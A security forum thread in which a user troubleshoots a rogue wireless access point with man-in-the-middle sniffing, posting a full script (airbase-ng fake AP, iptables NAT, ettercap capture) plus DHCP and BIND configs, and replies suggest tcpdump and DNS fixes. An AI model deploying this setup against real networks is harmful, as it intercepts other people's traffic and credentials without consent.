Page 1 of 2 12 LastLast
Results 1 to 10 of 11

Thread: rogue AP + MITM + DNS problems

  1. #1
    Junior Member
    Join Date
    Jan 2010
    Location
    Canada
    Posts
    84

    Default rogue AP + MITM + DNS problems

    ID like to start by clarifying that I am doing this as a learning experience, I had it working fine by the tutorial in the howto section, but I am unsure on how to integrate a DNS server: here is the relevant files, my attempt at least.

    /etc/dhcp3/dhcpd.conf
    ddns-update-style none;
    log-facility local7;
    subnet 10.0.0.0 netmask 255.255.255.0 {
    range 10.0.0.100 10.0.0.254;
    option domain-name-servers 10.0.0.1;
    option routers 10.0.0.1;
    default-lease-time 600;
    max-lease-time 7200;
    }
    /etc/default/dhcp3-server - has the right interface specified

    /etc/network/interfaces
    auto lo eth1
    iface eth1 inet dhcp
    iface lo inet loopback
    /etc/bind/named.conf.options
    options {
    directory "/var/cache/bind";
    forwarders { 208.67.222.222; 208.67.220.220 };
    auth-nxdomain no;
    listen-on-v6 { any; };
    };
    The commands I have in a script to run:
    kill `cat /var/run/dhcpd.pid`
    killall -9 dhcp3-server dhcpd wireshark ettercap airbase-ng
    airmon-ng stop eth1
    ifconfig eth1 down
    airmon-ng start eth1
    airbase-ng -e "ESSID" -P -C 30 -v eth1
    ifconfig at0 up
    ifconfig at0 10.0.0.1 netmask 255.255.255.0
    ifconfig at0 mtu 1400
    route add -net 10.0.0.0 netmask 255.255.255.0 gw 10.0.0.1
    iptables --flush
    iptables --table nat --flush
    iptables --delete-chain
    iptables --table nat --delete-chain
    iptables -P FORWARD ACCEPT
    iptables -t nat -A POSTROUTING -o eth0 -j MASQUERADE
    ettercap -T -q -p -i at0 // // &
    sleep 8
    echo "1" > /proc/sys/net/ipv4/ip_forward
    See any problems? Could having dhcp, dns, airbase-ng, and ettercap be to much for this box?

  2. #2
    Member
    Join Date
    Dec 2007
    Location
    @InterN0T
    Posts
    315

    Default

    What is it that doesn't work? If it's the DNS, don't you need more than those?

    Usually it's a good idea to put the basic zones in it and of course all the needed
    options, though i'm refering to ISC BIND which might be a bit different pal

    Running all those together should work as we have talked about, but that's
    just my opinion and i haven't played much with airbase-ng, though i have
    played a lot with ISC BIND and Ettercap, and DHCP (on a winbl0wz server).

    Well i did try to find the places where i found a lot of nice info on DNS servers, but i have forgotten them :-(
    (i do have a nice and properly configured named.conf somewhere, that's for ISC BIND though )
    [quote][I]I realized, that I had fallen down from the top of the mountain into a deep, terrifying and dark hole, just to find out that another mountain in front of me, much greater than the previous, was the next step in life. I began to wander uphill on the next mountain of life while I knew it would be much harder than the previous mountain. [/I]- MaXe[/quote]

  3. #3
    Junior Member
    Join Date
    Jan 2010
    Location
    Canada
    Posts
    84

    Default

    The DNS server is working, but the Tap interface isnt IE: Ettercap wont sniff the traffic now O.o

  4. #4
    Member
    Join Date
    Dec 2007
    Location
    @InterN0T
    Posts
    315

    Default

    Since you're acting gateway, why not TCP-Dump it all?

    Make sure when you test it, that there is actually traffic going through
    [quote][I]I realized, that I had fallen down from the top of the mountain into a deep, terrifying and dark hole, just to find out that another mountain in front of me, much greater than the previous, was the next step in life. I began to wander uphill on the next mountain of life while I knew it would be much harder than the previous mountain. [/I]- MaXe[/quote]

  5. #5
    Junior Member
    Join Date
    Jan 2010
    Location
    Canada
    Posts
    84

    Default

    Ill try that, and yes I can figure the whole Make that there is traffic thing

  6. #6
    Member
    Join Date
    Dec 2007
    Location
    @InterN0T
    Posts
    315

    Default

    Great, now when you TCP-Dump the traffic going through you, should i say
    that you should double-check your dumping on the right interface acting router?

    Just a heads up, i don't want to give false information. (though i'm not 100%
    sure if the traffic just goes to you or on one specific interface since this case
    involves multiple interfaces on One computer )
    [quote][I]I realized, that I had fallen down from the top of the mountain into a deep, terrifying and dark hole, just to find out that another mountain in front of me, much greater than the previous, was the next step in life. I began to wander uphill on the next mountain of life while I knew it would be much harder than the previous mountain. [/I]- MaXe[/quote]

  7. #7
    Junior Member
    Join Date
    Jan 2010
    Location
    Canada
    Posts
    84

    Default

    Well its quite complex in the end

    My computer has three interfaces (eth0, eth1, lo) and four ip addresses O.O

    eth0 has an external IP given by the network Im leeching off of (my own in this case) it also has an internal IP for that LAN.
    eth1 has the same external IP (everything gets forwarded) it also has its own internal IP (10.0.0.1).
    lo has its own internal IP because it gets forwarded to eth1 as a client.

    eth1 is acting as an access point, drawing from eth0. lo is connected to it via loopback. The dns server listens on every interface, but the only ones that will ask for a DNS request on 10.0.0.1, is the clients. Yet (!!) thanks to airbase, I also have a tap interface that everything gets forwarded through. O.O I should make a blueprint.

    Thanks MaXe, it seems to be working.

  8. #8
    Member
    Join Date
    Dec 2007
    Location
    @InterN0T
    Posts
    315

    Default

    Quote Originally Posted by HitThemLow View Post
    Well its quite complex in the end

    My computer has three interfaces (eth0, eth1, lo) and four ip addresses O.O

    eth0 has an external IP given by the network Im leeching off of (my own in this case) it also has an internal IP for that LAN.
    eth1 has the same external IP (everything gets forwarded) it also has its own internal IP (10.0.0.1).
    lo has its own internal IP because it gets forwarded to eth1 as a client.
    I got it to 5 IP's. eth0 has 2, eth1 has 2 and lo has 1? But four unique IP's in total. Insane xD

    Quote Originally Posted by HitThemLow View Post
    eth1 is acting as an access point, drawing from eth0. lo is connected to it via loopback. The dns server listens on every interface, but the only ones that will ask for a DNS request on 10.0.0.1, is the clients. Yet (!!) thanks to airbase, I also have a tap interface that everything gets forwarded through. O.O I should make a blueprint.
    Yeah make a blueprint in MS Paint next time!

    Quote Originally Posted by HitThemLow View Post
    Thanks MaXe, it seems to be working.
    Great to hear that man, i've been hoping for that for ages now!
    [quote][I]I realized, that I had fallen down from the top of the mountain into a deep, terrifying and dark hole, just to find out that another mountain in front of me, much greater than the previous, was the next step in life. I began to wander uphill on the next mountain of life while I knew it would be much harder than the previous mountain. [/I]- MaXe[/quote]

  9. #9
    Member imported_onryo's Avatar
    Join Date
    Apr 2009
    Posts
    109

    Default

    Hello MaXe,
    I have a feeling 208.67.222.222; 208.67.220.220 is a copy past. You need to use your own ISP. Look up what they have.

    Or you could try cat /etc/resolv.conf (guessing the IP to your router) and remove the above.

    Or try using 4.2.2.2 as a DNS server. It is "free" and works well.

    Could having dhcp, dns, airbase-ng, and ettercap be to much for this box?
    Should not be a problem if you get everything set up right. I have 3 cards running in my computer. One as a rouge AP, one for rouge transparency and the last one for surfing etc. Using an old P4.

    Best of luck with your endeavors

    onryo
    Let me explain officer, I am not a hacker. I am a security tester of sorts!

  10. #10
    Very good friend of the forum Virchanza's Avatar
    Join Date
    Jan 2010
    Posts
    863

    Default

    208.67.222.222 is a free public DNS server.

    To confirm that it works from your location, do:

    Code:
    nslookup virjacode.com 208.67.222.222
    (This tells nslookup to use 208.67.222.222 as the DNS server to look up virjacode.com)
    Ask questions on the open forums, that way everybody benefits from the solution, and everybody can be corrected when they make mistakes. Don't send me private messages asking questions that should be asked on the open forums, I won't respond. I decline all "Friend Requests".

Page 1 of 2 12 LastLast

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •